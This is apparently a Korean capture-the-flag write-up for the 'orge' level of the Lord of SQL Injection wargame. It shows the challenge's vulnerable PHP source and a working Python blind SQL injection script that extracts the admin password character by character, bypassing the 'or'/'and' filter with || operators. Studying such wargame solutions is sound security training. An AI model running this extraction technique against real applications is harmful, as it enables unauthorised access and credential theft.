[LOS] gremlin 풀이
PHP & query
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");
highlight_file(__FILE__);
?>
select id from prob_orge where id='guest' and pw=''
문제 풀이
더보기
solve 조건
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");
정확한 pw값을 요구하는 문제이다 4번문제랑 동일하다.
특수문자 제약
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
and,or을 사용하지 못 한다. 4번문제 파이썬 코드에 ||,&&으로 바꾸기만 하면 해결된다.
Python code
import requests
URL='https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'p68istnh0anectj0ur6ttevv22'}
password = ''
length = 0;
for i in range(100):
query={'pw': '\' || length(pw) = '+str(i)+' # '}
res=requests.get(URL, params=query, headers=headers, cookies=cookies)
if('Hello admin' in res.text):
print(i)
length=i
break;
for i in range(length):
for j in range(ord('0'),ord('z')+1):
query={'pw': '\' || substr(pw,'+str(i+1)+',1) = \'' + chr(j)+ '\'#'}
res=requests.get(URL, params=query, headers=headers, cookies=cookies)
if('Hello admin' in res.text):
password = password + chr(j)
print(password)
break;
4번문제랑 똑같다.
URL
los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec
'CTF > LOS' 카테고리의 다른 글
[LOS] vampire 풀이 - 9번 (0) | 2020.09.15 |
---|---|
[LOS] troll 풀이 - 8번 (0) | 2020.09.15 |
[LOS] darkelf 풀이 - 6번 (0) | 2020.09.15 |
[LOS] wolfman 풀이 - 5번 (0) | 2020.09.15 |
[LOS] orc 풀이 - 4번 (0) | 2020.09.15 |